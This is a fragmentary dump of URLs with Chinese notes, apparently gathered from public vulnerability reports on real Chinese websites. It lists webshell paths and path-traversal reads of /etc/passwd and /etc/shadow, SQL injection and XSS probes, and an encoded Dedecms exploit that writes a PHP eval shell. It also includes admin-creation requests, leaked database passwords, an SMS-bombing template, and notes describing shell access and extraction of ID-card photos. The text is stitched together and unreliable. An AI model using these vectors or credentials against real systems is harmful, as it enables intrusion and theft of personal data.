http://m.ftchinese.com/index.php/users/mobilelogin?gourl=%2Fstory%2F001051296 http://www.jjgk.sc.sgcc.com.cn:7777/stdpm/ http://atcy.anta.com/ http://atcy.anta.com/lan.aspx http://atcy.anta.com/nick.asp http://atcy.anta.com/anli/201112/lan.aspx http://atcy.anta.com/shell.asp http://atcy.anta.com/shell.asp;.jpg http://atcy.anta.com/shell.asp;1.jpg http://atcy.anta.com/install/default.aspx http://123.125.38.79:8080 http://123.125.38.79:8080/resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml http://123.125.38.79:8080/resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp http://123.125.38.79:8080/resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml http://123.125.38.79:8080/resin-doc/examples/ioc-periodictask/viewfile http://www.hkguanhui.com/plus/mybak.php http://www.hkguanhui.com/plus/90sec.php http://zone.wooyun.org/content/4261 http://zone.wooyun.org/content/4226 http://114.247.129.12/ulp/ http://en.anta.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://en.anta.com/fckeditor/editor/filemanager/connectors/php/connector.php http://en.anta.com/file/image/fuce.php http://www.19lou.com/util/email/active/sendchange http://www.nicaimp.com/down/class/index.php?myord=cl http://music.weibo.com http://mail.ah.gov.cn/ http://0535.ctwap.cn/tyfy/uploadpic.jsp http://jifen.360.cn/lotteryrich.html http://www.tj.jcy.gov.cn/LoginManage.aspx http://webmail.dg.gov.cn/feedback/saveFeedback.do http://211.151.123.232/desktop/parse.action http://192.168.1.151:8080/ http://gboss.id5.cn/empQuery.do?operate=list,这里可以看到用户列表,查询用户这个有注入 http://gboss.id5.cn/business/webBatchUpload.do?operate=download&type=1&thrId=120944358&callType=2&url=filepath,试下下载/etc/passwd,成功。扫描到他开放了7001端口,访问http://gboss.id5.cn:7001/console/,weblogic的后台,试了下默认密码,进不去,用之前的文件下载漏洞,下载到weblogic的配置文件,本地搭环境,把密码解密了出来,进weblogic后台,部署war,成功拿下shell。然后反编译网站的class,找到了接口的调用方法,和接口的授权文件。在网上找了个身份证号来测试,成功看到照片。照片用base64解密下就行了 http://iyouxi.baidu.com/i/ajax_store.xhtml?c=pay&productId=253&productCategory=coin&buyCount=1 http://iyouxi.baidu.com/i/ajax_store.xhtml?c=pay&productId=99&productCategory=coin&buyCount=1 http://service.haier.net:8080/ http://www.eqsc.gov.cn/CCPT/ccpt/knowledge-hot!cptZHjianZaiSimpleSearch.action?inputboxzh=1 http://www.eqsc.gov.cn/CCPT/cc.jsp http://cho.zhaopin.com/pinglun.jsp?channelid=7 http://cho.zhaopin.com/zhuanlan.jsp?authorid=5&channelid=32 http://blog.ptjy.com/help.aspx直接登上去,发现存在脱裤脚本。 www.ptjy.com,端口一样,密码错误。 http://blog.ptjy.com的c段,发现有存在一台服务器,目测也是教育局的。202.101.111.24,也是密码不同,纳闷了。 http://cdc.cma.gov.cn/gx/web/login.jsp http://www.alibaba.co.jp http://my.goodbaby.com/ucenter/avatar.php?size=small&gbuid=362429 http://my.goodbaby.com/ucenter/avatar.php?gbuid=1112949730 http://59.38.32.132/common/lin_tell.asp?ID=2 http://211.151.115.38/WEB-INF/web.xml http://211.151.115.39/WEB-INF/web.xml http://211.151.115.40/WEB-INF/web.xml http://211.151.115.41/WEB-INF/web.xml www.scpop.gov.cn http://www.wcfy.gov.cn/scjg/admin_login.asp http://www.dyxjyj.com/news.asp?DHID=192注入点 http://www.dyxjyj.com/zgadmin/login.asp后台 http://www.wcfy.gov.cn/x.asp http://www.wcfy.gov.cn/bys.asp http://211.151.249.134/BHDataCenter/login.action http://i.autohome.com.cn/ajax/relations/addfollower?fuid=8001685 http://i.autohome.com.cn/ajax/relations/addfollower?fuid=8001685&a=a.gif http://jxxt.sues.edu.cn/eams/login.action http://partner.etms.360buy.com/OrderOperationsBySite/PS_ZhanDianShouKuanPL.aspx http://bbs.mda139.com http://www.dns-edu.com/admin/member/index.asp可使用万能密码'or'='or'绕过,获得网站管理员权限,对主网站内容、会员私人信息、留学申请等进行管理 http://deptweb.cqupt.edu.cn/xxzx/nav.php?id=179&level=2&cat_id=30 jdbc:sqlserver://172.16.3.190:1433;user=reader;password=bh123** http://sys.59.cn/System/ViewWork.asp?id=199472,讲此id进行遍历可查询到其他用户提交的事务 http://training.htinns.com/download/ http://data.sports.sohu.com/golf/webroot/course_list.php?province=%E7%A6%8F%E5%BB%BA&hole_number=all&price=all&price_type=fee_n_visiter&course_name=&order_by=fee_n_visiter%20desc http://static.sse.com.cn这个域名来访问,而与服务器交互的动态脚本采用各业务系统的二级域,或主站的www.sse.com.cn来解析。 http://static.sse.com.cn/WEB-INF/web.xml www.sse.com.cn业务线的所有脚本文件源码。 http://biz.sse.com.cn/sseportal/cs/zhs/yzm/CreadGeneratedCode.jsp http://static.sse.com.cn/sseportal/cs/zhs/yzm/CreadGeneratedCode.jsp http://biz.sse.com.cn/sseportal/ps/zhs/ca/ca_intro.jsp http://static.sse.com.cn/sseportal/ps/zhs/ca/ca_intro.jsp http://ss.hnu.cn/mse/tutor.aspx?id=1%E2%80%98 http://www.dajie.com/corp/1036039/discuss/topic/177224/edit?recycle=false http://www.kuaikuai.cn/存在存储型跨站漏洞,在提问处的标题处存在跨站,可直接提问,插入恶意代码,窃取任意用户的cookie信息。通用的说 http://me.ztgame.com/account_manage/modiInfo.do www.amanktv.cn http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/shop_gift_list.php?type_id=4&order=start_time%20desc http://www.66call.com/manage_66call/admin_newsManage.aspx# http://www.66call.com/newstype.aspx?type=-1+OR+17-7%3d10 http://www.66call.com/manage_66call/admin_newsManage.aspx# http://tg.union.tudou.com/mini/ http://chem.jlu.edu.cn/chemistry/depart.php?id=146&&cid=3&&deid=3 http://pk.tom.com/web/download_page.jsp?from=00403&q_id=99&mobile_game_id=609&class=and http://www.sgwsj.gov.cn/admin/upimg/ site:http://static.sse.com.cn/ filetype:jsp,可得到大量上海证券交易所的源码信息。 http://localhost/index.php?m=template&c=file&a=init&style=default&dir=announce&pc_hash=V2OA8M http://www.ndi.mil.cn/ http://www.htair.net/tools/dd.asp页面通过手机号查询订单号 http://www.htair.net/ticket/flights/order_viewedit.asp?order_id={0 http://www.htair.net/ticket/flights/order_viewedit.asp?order_id=20120724114110 http://www.htair.net/ticket/flights/order_viewedit.asp?order_id=20120516233134 http://www.htair.net/ticket/flights/order_viewedit.asp?order_id=20120415210712 http://www.htair.net/ticket/flights/order_viewedit.asp?order_id=20120312170811 http://v.soufun.com/videomanage/video/VY.aspx?videoId=22007 http://v.soufun.com/videomanage/logon.aspx http://www.cemaia.org.cn/ http://ca.ufida.com.cn:8080/admin-enroll/console/ http://ca.ufida.com.cn:8080/admin-enroll/console/console.do http://www.yadeasv.com http://www.yadeasv.com/plus/ad_js.php?aid=9090 http://job.bjut.edu.cn/bjutCms/course/queryAllCourseInfo.action http://support-cn.samsung.com/StoreLocation/store/show/16752 http://61.129.103.71/ http://61.129.103.71/attachment/ http://61.129.103.71/manager/manager.xml http://61.129.103.71/manager/status.xsd http://3g.nw.sgcc.com.cn:8080/nwpr/index_indexAction.action http://www.cdgs.gov.cn/go/mhwz/sreach/sreach_list.go http://rstimes.com/admin/fckeditor/editor/fckeditor.html http://rstimes.com/upload/file/cmd.aspx http://60du.net/index.html http://help.sogou.com/hd/personfind/one.php?id=15604 http://www.ygshangjie.com/ http://xxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 http://xxx.com/plus/mytag_js.php?aid=9013 http://xxx.com/plus/90sec.php http://admin.super8.com.cn中的fckeditor http://admin.super8.com.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://admin.super8.com.cn/fckeditor/editor/filemanager/connectors/asp/connector.asp http://www.xjbtjshbj.gov.cn/data/dig.php http://www.xjbtjshbj.gov.cn/data/api.inc.php http://www.xjbtjshbj.gov.cn/data/cache/pker.php http://www.ccard.net.cn/ccard/sortproduct/sortCard!soryCategory.action http://bj.bbs.house.sina.com.cn/bbs/post/show/?pid=5760565591639346474 http://bbs.51zhangdan.com/ http://bbs.51zhangdan.com/robots.txt/1.php http://job.super8.com.cn/backend.php/interface/getdoc/?path=/../../../../etc/passwd http://capital.datanggroup.cn/index.php?action=getmsg&newsid=682 http://180.169.5.42/ http://180.169.5.42/ftb.imagegallery.aspx http://180.169.5.42/ftb.imagegallery.aspx?frame=1&rif=images&cif=..\..\..这里可以列目录 http://jlxxxt.sgcc.com.cn:8900/acgpm/project/login/login.action http://images.wandafilm.com/ http://www.leiphone.com/wp-includes/pomo/mo.php weiqi.sports.sohu.com/qipu/qipumain.asp?Do=Search&P1=1 weiqi.sports.sohu.com/qipu/Login.asp site:a.dodonew.com http://a.dodonew.com:8080/dodonew/front/userCenter/index.jsp?dodoId=12121232 http://a.dodonew.com:8080/dodonew/back/exchange.Commodity.page http://api.market.bitauto.com/admin/ http://api.market.bitauto.com/webadmin/UploadDB2012/ http://lvr.land.moi.gov.tw/N11/homePage.action url:http://b2c.366ec.com/admin/controls/PermissionHandler.ashx referer:http://b2c.366ec.com/admin/Permission/RolePermissionManage.aspx?RoleId=1 post:type=save_rolepermission&RoleID=1&Ids=19%3A3298536980849%7C20%3A17%7C66%3A17%7C144%3A21%7C21%3A17%7C22%3A15%7C23%3A393231%7C24%3A15%7C25%3A31%7C26%3A271%7C27%3A6291471%7C33%3A17%7C34%3A1%7C35%3A17%7C145%3A17%7C188%3A17182001615%7C41%3A1638913%7C42%3A5%7C45%3A2162719%7C46%3A65567%7C47%3A2162703%7C153%3A15%7C48%3A31%7C57%3A15%7C58%3A143%7C59%3A15%7C60%3A2079%7C61%3A2063%7C62%3A180388609754757%7C63%3A140737490452497%7C64%3A8392713%7C161%3A39651121399429%7C162%3A35253074888325%7C163%3A68702799493%7C164%3A35184373137609%7C65%3A70368746668175%7C152%3A145%7C67%3A31%7C69%3A395279%7C146%3A17%7C70%3A395273%7C147%3A17%7C80%3A15%7C81%3A65551%7C82%3A65551%7C83%3A1%7C84%3A2053%7C85%3A17%7C86%3A426005%7C91%3A412316880005%7C92%3A19073%7C165%3A1855425891461%7C166%3A206158449793%7C167%3A2336462228625%7C168%3A137438973065%7C169%3A137438973065%7C170%3A137438973065%7C171%3A137438973065%7C173%3A18561%7C174%3A18561%7C175%3A18561%7C176%3A18569%7C177%3A18569%7C94%3A137438955673%7C95%3A137438955673%7C96%3A137438955673%7C97%3A18569%7C98%3A18569%7C99%3A18569%7C100%3A18569%7C101%3A137%7C107%3A2109327%7C108%3A2097167%7C149%3A17%7C110%3A4111%7C111%3A17%7C112%3A8388623%7C113%3A8388623%7C114%3A8388617%7C115%3A8521749%7C116%3A2057%7C191%3A2109327%7C192%3A2097167%7C195%3A2109327%7C196%3A2097167%7C109%3A17%7C156%3A17%7C122%3A2065%7C123%3A17592186044417%7C124%3A17592186044417%7C125%3A129%7C126%3A17592186044545%7C127%3A17592186044545%7C128%3A17592186044545%7C129%3A129%7C130%3A17592186044545%7C131%3A2177%7C547%3A17592186044545%7C28%3A1%7C180%3A68702799495%7C181%3A2490511%7C182%3A145%7C185%3A2177%7C186%3A2177%7C187%3A129%7C29%3A17%7C30%3A4194305%7C31%3A2097153%7C32%3A17%7C136%3A2490383%7C137%3A15%7C138%3A2097167%7C139%3A9%7C140%3A105%7C141%3A9%7C142%3A5%7C url:http://b2c.366ec.com/admin/controls/operdo.ashx referer:http://b2c.366ec.com/admin/config/addoper.aspx?width=720&height=400&_=1373093738559 post:type=save_oper&username=test&role=1&status=1&realname=test&pwd=123456&usercode=1111 http://test.union.tudou.com/test/ http://test.union.tudou.com/test/break/up/forup2.rar http://test.union.tudou.com/test/lechen/tool/phpMyAdmin/ http://12580wap.10086.cn/life/wap2/activity_intro.php?activity_id=35 http://12580wap.10086.cn/daohang/index.php?fid=0002&v=2&pid=u01'&m=1365102621000_302&vd=&md=&ci=10000000&rtm=1365102621982&lsh=60nmru6kmr7&&getu=1&m=&vendor=&model=&vd=&md=&mCnt=2 http://dota2db.games.sina.com.cn/?a=hero_info&id=10487 http://www.cdt-yn.com/dtynwebsec/listshowinfotest.jsp?id=122&cid=114 http://big5.xinhuanet.com/gate/big5/big5.home.news.cn/gate/big5/book1.news.cn/admin/login.jsp http://res.ikanshu.cn/imgs/da.jsp;.jpg(存放图片服务站点) http://www.cdt-sx.com/front/mainAction.action http://koodemontest22.koofang.com:8022/admin/AdminLoginForm.aspx?url=main.aspx http://www.cdt-gz.com//accessoriesAction.ndo?action=download&itemId=594B890B-8C27-C0C2-9397-3666DC541BD0&filePath=/upload/594B890B-8C27-C0C2-9397-3666DC541BD01346922637747.pdf&fileName=%BC%AF%CD%C5%B9%AB%CB%BE%C6%F3%D2%B5%CE%C4%BB%AF%CA%D3%C6%B5%BD%B2%D7%F9%BF%CE%BC%FE.pdf http://www.cdt-gz.com//accessoriesAction.ndo?action=download&itemId=594B890B-8C27-C0C2-9397-3666DC541BD0&filePath=/index.jsp&fileName=index.jsp http://www.renrencard.com/sql/ http://www.surfingjs.com/index.php时无意间发现了一个oa平台: http://202.102.41.62/hsoa/index.htm http://m.super8.com.cn/Ajax/GetHotelData.ashx?action=GetRmTypeName&t=SK&oid=148 http://m.super8.com.cn/Ajax/GetHotelData.ashx?action=GetImg&hotelid=148 http://m.super8.com.cn/Ajax/GetHotelData.ashx?action=GetPriceDes&s=2013-07-18&e=2013-07-19&t=SK&h=148 http://m.super8.com.cn/Ajax/GetHotelData.ashx?action=GetHotelPage&code=1003&sdate=2013-07-18&edate=2013-07-19&shotelkey=1&page=0 http://pan.baidu.com/share/link?shareid=228348&uk=2318699196 http://www.china-cdto.com/hwtzweb//accessoriesAction.ndo?action=download&itemId=3948D7CD-7908-DEE4-9325-79A6F3A9C744&filePath=/index.jsp&fileName=index.jsp http://wp.msn.com.cn/app/619eeab3-e459-440c-a924-2a7aa4236c0d.shtml http://iqiyi.com/server-status http://www.yundaex.com/area.php?m=get_post_code&id=1 http://comment.cnr.cn/cnrmsg/admin/index.php?do=login http://112.90.56.99/index.php/admin/login?error=error%20password%20or%20username http://system.greentree.com.cn:8070/ http://eagle.gfan.com/projecteagle.aspx cn:8080 http://192.168.1.1/cgi-bin/upload.php?name=2013-07-11-001700.bak http://pic.gmw.cn/admin/ http://mhi.gdsafety.gov.cn/ http://sse.eln.com.cn/eln/reg.php?gsid=1925 http://122.11.45.188/solr/#/ http://product.it.sohu.com/core/admin/ http://mts.zte.com.cn/Mtsmap/CustomerLogin.aspx http://mts.zte.com.cn/Mtsmap/就会出现目录遍历,并且有许多rar压缩文件可供下载,许多涉及一些手机项目的参数以及许多手机及手机相关的图纸信息,等于是不需要任何权限下载这个供应商图纸管理系统里的所有文件图纸,访问授权形同虚设! https://tgonline.moe.gov.sg/tgis/secure/loginStudent.action inurl:zone.pptv.com找到了几个活动的后台,其中个人信息挺多的...算信息泄露了吧, http://zone.pptv.com/durex/admin/index http://www2.chekucafe.com/login.php http://www.cdcgs.cn/Message/Complain.aspx http://www.cdcgs.cn/webconsole/Login.aspx cookie:admin=62 http://www.cdcgs.cn/static/BIN/130711/123414742.aspx www.leiphone.com/v.php?a=1&pt=author&r=http://www.leiphone.com/&t=web http://kuainv.pptv.com/event/list?t=ing&sort=join_cnt data:text/html;base64,PGlmcmFtZSBzcmM9aHR0cDovL3d3dy53b295dW4ub3JnPg== http://bu.uc.cn/logs/ http://bu.uc.cn/public/ http://www.imeach.com/giftList.php?catid=18&only=&order=&score=&sort= http://dlxtag.lenovo.com/BSF/ http://888.qq.com/m.html http://shouji.kuwo.cn/ http://huifu.qq.com/recovery/index.html?frag=1 http://account.iicall.com/qwerasdfa2134sdfx/addclass.asp http://account.iicall.com/qwerasdfa2134sdfx/addadmin.asp http://account.iicall.com/qwerasdfa2134sdfx/addnews.asp http://account.iicall.com/qwerasdfa2134sdfx/admin.asp http://account.iicall.com/qwerasdfa2134sdfx/bbs1.asp http://account.iicall.com/qwerasdfa2134sdfx/black.asp http://account.iicall.com/qwerasdfa2134sdfx/call.asp http://account.iicall.com/qwerasdfa2134sdfx/delnews.asp http://account.iicall.com/qwerasdfa2134sdfx/editnews.asp http://account.iicall.com/qwerasdfa2134sdfx/freeze.asp http://account.iicall.com/qwerasdfa2134sdfx/friend.asp http://account.iicall.com/qwerasdfa2134sdfx/function.asp http://account.iicall.com/qwerasdfa2134sdfx/login.asp http://account.iicall.com/qwerasdfa2134sdfx/logout.asp http://account.iicall.com/qwerasdfa2134sdfx/news.asp http://account.iicall.com/qwerasdfa2134sdfx/savenews.asp http://account.iicall.com/qwerasdfa2134sdfx/ub.asp http://account.iicall.com/qwerasdfa2134sdfx/updateuser.asp http://www.adiconhealth.com/NewSearch/FinaRepoit.aspx?PatientCode=XXXXXXXXXXXX http://k.pcauto.com.cn/admin/auth-client/sel-user.jsp http://huodong.womai.com/bailing-gz/api/getInfoByUid.php?&web=bj&name=1%27 http://dragonpass.com.cn/f-news-show?news.id=47959这种地址大致猜想news.id对应后台的对象与属性,猜测应该是用了struts框架,就试了下是否存在命令执行的问题,果然还是存在的。 http://finance.cmpp.ifeng.com/Cmpp/index.jhtml http://g.cmpp.ifeng.com/Cmpp/index.jhtml http://211.156.193.141/showGG.jsp?ggid=1 http://card.chinapost.com.cn/ http://yy.hn165.com/ http://yy.hn165.com/data.rar http://yy.hn165.com/123.rar http://www.renren.com/123456789/profile,记录123456789,这是目标的 http://photo.renren.com/photo/123456789/album-profile http://photo.renren.com/photo/123456789/latest/photo-987654321 http://lvyou.baidu.com http://status.renren.com/status/123456789 http://share.renren.com/share/123456789 http://www.xwjj.com/announce/show.php?an_id=9 http://www.xwjj.com/test.php http://www.xwjj.com/info.php http://svn.go.sohu.com/2012/china4abm/index.php http://svn.go.sohu.com/2012/china4abm/index.php?r=post/view&id=1303 http://svn.go.sohu.com/2012/china4abm/index.php?r=post/update&id=1303 http://shai.goodbaby.com/_api/api.php?schema=get_share_like_count&cids=2 http://hb.189.cn/ http://opinion.chinabyte.com/reader/reader.jhtml?sitemapId=1&url=http://www.chinabyte.com&title=%B1%C8%CC%D8%CD%F8 http://cms.chinabyte.com/welcome/init.jhtml http://cms.chinabyte.com/welcome/init.jhtml http://cif.mofcom.gov.cn/site/FCKeditor/editor/filemanager/browser/default/browser.html.bak?Type=../&Connector=connectors/jsp/connector http://www.998.com/Active/Promotions.aspx?Tab=-1&PageIndex=0&Keyword=a url:http://lefen.lenovo.com/index.php/kebi/ http://hi.alipay.com/query/gift_detail.htm?prizeSendId=184809793&_xbox=true http://fm-ask.kunlun.com http://go.sohu.com/2013/yangtianM490s/work.php?workid=8076 http://admin.focus.cn/ www.fumu.com http://drops.wooyun.org/tips/125思路。 http://feedback.vrs.sohu.com/feedback/info.jsp?id=380056 http://feedback.vrs.sohu.com/feedback/info.jsp?id=380052 http://www.e-trans.com.cn:8050/schoolbus/login.action http://www.e-trans.com.cn/loginfour.html http://www.e-trans.com.cn:8090/etrans4002/ http://www.it168.com/remen/dianping/ http://www.sjzbus.com.cn/upload/ http://bbs.39.net/by/forum/457-1-1.html http://bbs.39.net/user/1965735.html http://my.39.net/passport/findPwd.aspx http://219.141.187.20/display.aspx?ID=10&Type=statute http://sc.m.sohu.com http://sc.m.sohu.com/uc/v2/profile/modifyUserAddress http://sc.m.sohu.com/uc/v2/product/list http://sc.m.sohu.com/uc/v2/user/otherByUid?uid=fb3edcfcc1c446as(这里的链接可以知道别人的UID。如果看到他兑换了不错的东西 http://sc.m.sohu.com/uc/v2/message/friendDialog?otherUid=fb3edcfcc1c446as http://m.10086.cn/wireless/n-migu/regbox.htm?q=这里填写要轰炸的手机号码&id=3772&k=002000a http://product.news.sohu.com/news/60year/add.php http://product.news.sohu.com/news/60year/infog.php?id=109 http://vip.club.sohu.com/zhumengtianshi/list.php?type=new&page=15 http://www.meile.com/text/create http://***.com/test.html https://210.74.41.142/manager/html/ http://dkp.yunquezhai.com/gonggao.php?type=wz&id=172%20and%201=1 http://dkp.yunquezhai.com/gonggao.php?type=wz&id=172%20and%201=2 http://dkp.yunquezhai.com/gonggao.php?type=wz&id=178 http://www.leiphone.com/live/index.php?id=1 http://tech.sanygroup.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../ http://tech.sanygroup.com/service/JspSpyJDK5.jsp http://125.35.5.195:808/login.jsp http://155274965.vip.yy.com/ http://123456.vip.yy.com/ http://www.gdzl.gov.cn/trm/base/TrmHis!index.do http://www.njjnjsj.gov.cn/login/CmsSubmit.do http://www.gykj.gov.cn/login/Jeecms.do http://www.sdas.org/login/CmsSubmit.do http://www.jnxzsp.gov.cn http://www.jnxzsp.gov.cn/ViewSource/SrcNotice.aspx?infoFlowId=00547 http://gzonline.gov.cn/OutPortalsql/ViewSource/SrcNotice.aspx?infoflowId=00107 http://www.jnspzx-sd.gov.cn/ViewSource/SrcNotice.aspx?infoflowId=00233 http://www.jhxz.gov.cn/ViewSource/SrcNotice.aspx?infoflowId=00184 http://cysp.qingdao.gov.cn/ViewSource/SrcNotice.aspx?infoflowId=01019 http://xzfw.zhanjiang.gov.cn/ViewSource/SrcNotice.aspx?infoflowId=02358 http://www.bltzfw.gov.cn/wsbsdt/ViewSource/SrcNotice.aspx?infoflowId=00231 http://60.211.195.50/ViewSource/SrcNotice.aspx?infoflowId=00014 http://www.lsxzwfwzx.com/lssp/ViewSource/SrcNotice.aspx?infoflowId=00418 http://www.whaac.gov.cn/ViewSource/SrcNotice.aspx?infoflowId=01911 http://www.ytshenpi.cn/ViewSource/SrcNotice.aspx?infoflowId=00471'm http://www.leiphone.com/api/v4author.php?aid=1&pid=1 http://www.qqddc.com/lvyuanfighter.do?method=lyList&qid=1265&from=/admin/homeSiteNews.do?method=toadd http://g.youc.com http://plus.aili.com/include/.svn/ http://plus.aili.com/error/.svn/entries http://plus.aili.com/templates/.svn/ http://plus.aili.com/include/.svn/text-base/data.class.php.svn-base http://www.xjfp.gov.cn/admin/ http://www.xjfp.gov.cn/admin_config.aspx http://hm.xjfp.gov.cn/admin/ http://hm.xjfp.gov.cn/admin_config.aspx https://www3.hicloud.com/user/login.action?request_locale=zh_HK eth0:acce encap:Ethernet addr:172.22.192.9 Bcast:172.22.192.255 Mask:255.255.255.0 MTU:1500 eth0:serv encap:Ethernet addr:192.168.1.103 Bcast:192.168.1.255 Mask:255.255.255.0 MTU:1500 eth0:acce encap:Ethernet addr:172.22.192.10 Bcast:172.22.192.255 Mask:255.255.255.0 MTU:1500 eth0:serv encap:Ethernet addr:192.168.1.104 Bcast:192.168.1.255 Mask:255.255.255.0 MTU:1500 https://www6.hicloud.com/user/login.action http://220.181.168.128/ http://220.181.168.128:8080/user/login# http://kf.youc.com/ http://kf.youc.com/plus/mytag_js.php?aid=9090 https://www5.hicloud.com/guide/showAnZhuo.action https://www.hicloud.com/guide/showAnZhuo.action https://www2.hicloud.com/guide/showAnZhuo.action https://www4.hicloud.com/guide/showAnZhuo.action encap:Ethernet addr:10.32.2.121 Bcast:10.32.2.255 Mask:255.255.255.0 MTU:1500 packets:98120090 txqueuelen:1000 http://www.sz[马赛克].gov.cn/ http://ec.crcc.cn/b2b/web/fileuploadAction.do?method=downLoad&fileName=web.xml&fileType=text&fjbh=web&fjml=/WEB-INF/ http://ec.crcc.cn/b2b/web/uploadAction.do?method=downLoad&fileType=text&fileName=/etc/shadow http://ec.crcc.cn/b2b/web/two/indexinfoAction.do?actionType=showOneProduct&xh=2&dwbm=-1 http://122.224.96.66/wappda.asp?Method=GET&Name=560001115481 http://drops.wooyun.org/tips/143 http://www.freebuf.com/articles/web/5411.html http://www.zjcrb.cn/fckeditor/editor/filemanager/upload/test.html http://220.181.109.120:8080/ http://www.chinacourt.org/article/index/id/MzAwNDDIMCAOAAA%3D.shtml http://www.nercb.cas.cn/login/NercbLogin.do http://www.magnotel.com/Inn/chains.aspx?UnitID=9006 http://www.cast.org.cn http://app03.cast.org.cn/guestbook/del.jsp?id= http://wapplat.tom.com/ivr/ivr_ring_admin.jsp http://cpadmin.ule.tom.com/cpadmin/staff.do?method=doQuery http://cpadmin.ule.tom.com/cpadmin/login.do http://merchant2.ule.tom.com/seller/login.do DB:61.155.xxx.xx:1521:orcl user:zjgweb pass:zjgweb http://xss.com http://localhost/xss.css http://203.88.202.81:8080/gzjf/common/sqrdl.action http://www.max78.com/Pay/PayIndex.aspx http://www.nd56.com/address.asp?site=%B0%CD%D6%D0%CA%D0 http://msg.mail.163.com/cgi/mc?username=%3Cscript%3Ealert%281%29%3C/script%3E http://msg.vip.163.com/cgi/mc?username=%3Cscript%3Ealert%281%29%3C/script%3E http://msg.vip.126.com/cgi/mc?username=%3Cscript%3Ealert%281%29%3C/script%3E http://msg.vip.126.com/cgi/mc?username=%3Cscript%3Ealert%281%29%3C/script%3E http://www.cnfpzz.com http://www.cnfpzz.com/NewsList.aspx http://www.cnfpzz.com/NewsList.aspx?MenuID=242为例 http://www.cncscs.org http://www.cncscs.org/view.asp?id=3331 http://www.shanxilr.gov.cn/山西国土资源厅 http://www.shanxilr.gov.cn/manage/Admin_login.asp http://www.shanxilr.gov.cn/manage/Admin_Page.asp http://www.shanxilr.gov.cn/x.asp http://www.shanxilr.gov.cn/Cnnsc.asp http://www.shanxilr.gov.cn/Cnnsc.asp http://www.shanxilr.gov.cn/x.asp www.che168.com http://cs.beta.ulechina.tom.com/feedback/toUsrQuery.do http://www.ehuafeng.com/oa/default.asp http://cpadmin.ule.tom.com/postsalesummary.jsp http://cpadmin.ule.tom.com/cpadmin/staff.do?method=doQuery http://www.lsgtzy.com/Second_DownLoadFile.aspx?name=../../web.config http://www.58.sc.cn/ http://s-40448.gotocdn.com为织梦,上exp,秒之 http://s-40448.gotocdn.com/plus/siling.aspx http://58.sc.cn/1937cN.html http://xc.uc.cn/bbs/data/attachment/forum/201307/14/184409pi1x9ztt94440ap0.gif/.php http://media.ccidedu.com/ http://dl.ccidnet.com/ ftp://115.182.21.17/rk/ http://zone.wooyun.org/content/4537。 http://12094.mmb.cn/wap/touch/home/index.jsp http://12094.mmb.cn/wap/findpassword/sendBandPhoneNum.do?findPasswordIndex=1 http://12094.mmb.cn/wap/findpassword/sendNewPassword.do http://yunda.yonyou.com/index.do http://218.28.206.52:8080/ http://auto.ynet.com/ppbase/pphotos.php?b=%B3%A4%B0%B2%B8%A3%CC%D8&s=1517 http://auto.ynet.com/admin/ http://www.tudou.com/my/setting/private.action http://pan.baidu.com/share/link?shareid=532369&uk=1594048901 http://www.verycd.com/blog/?author=1 http://www.verycd.com/blog/wp-login.php http://www.verycd.com/blog/about/ http://120.132.144.18/checkLogin.action http://love.syradio.cn/admin/main.php http://www.dzpost.com,然后看图 http://www.dzpost.com/shbgl/shb_search_xx.asp?action=search&h=,然后看图 http://lottery.sports.sohu.com/esunmanage 